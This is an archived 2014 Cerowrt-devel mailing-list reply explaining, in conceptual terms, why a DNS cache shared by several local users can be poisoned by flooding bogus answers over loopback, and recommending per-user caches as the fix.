[Cerowrt-devel] Full blown DNSSEC by default?

Simon Kelley simon at thekelleys.org.uk
Thu Apr 17 17:01:30 EDT 2014


On 14/04/14 00:24, Dave Taht wrote:
>
> 
> So far as I know the caching functionality in dnsmasq in that instance
> is disabled due to fears about cache poisoning, that I don't fully
> understand. My half understood fear translates into equivalent fears
> for other local dns daemons.
> 

My understanding is that this relates to multi-user systems where the
users share the cache  and run on the local machine.

Essentially, if I can generate cache misses at will, ie by making
queries, then I can synchronously flood the DNS cache with bogus answers
to the query. Source-port randomisation doesn't help: a simple netstat
or equivalent will tell me that, so the only protection is the 16-bit
query-id, which is no protection at all: 64k UDP packets via the
loopback interface can easily arrive before one from the wider internet.

That allows a user to poison his own DNS, but if the cache is shared,
then it allows him to also poison the DNS of any other user on the machine.

The solution is per-user caches.


Simon.





More information about the Cerowrt-devel mailing list